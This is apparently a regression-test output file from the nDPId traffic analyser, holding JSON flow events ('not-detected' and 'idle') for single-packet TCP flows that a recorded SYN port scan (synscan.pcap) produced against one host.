-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
